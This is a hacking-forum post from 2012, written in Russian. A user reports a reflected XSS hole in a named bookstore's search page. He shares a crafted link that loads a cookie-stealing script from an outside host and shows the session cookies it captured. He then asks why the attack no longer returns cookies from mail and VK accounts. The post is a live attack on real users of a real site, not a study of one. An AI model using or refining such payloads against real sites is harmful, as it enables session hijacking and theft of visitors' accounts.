HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.08.2012, 01:00
virtuoso_
Познающий
Регистрация: 09.03.2012
Сообщений: 51
С нами: 7461686

Репутация: 0
По умолчанию

Всем привет у меня проблема с XSS.
В общем нашол уязвимость http://www.kniga.ru/search/?q=">alert('Fucked') и решил воспользоваться снифферам hacker-pro. В итоге вышло вот этот код
Java highlight

Код:
http:
//www.kniga.ru/search/?q=">%3CSCRIPT type=text/javascript src=http://httpz.ru/aorthyjyqpgo.js>"
но когда кто нибудь переходит по этой ссылке выдаёт какую то чуш типа

source:

Код:
PHPSESSID
=daf50dd919af1d3cb4c6c059f1e1f6af
; _uc=8da8bdfd5980376cddefb157e6ca5a54; BITRIX_SM_SALE_UID=144347652; _ym_visorc=b.

Я что то не так делаю или что? На сколько помню раньше выдавала куки от mail, vk итд.
p.s А если на этом сниффере генерировать поссивный XSS в ссылку то вообще не чего не выдаёт.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.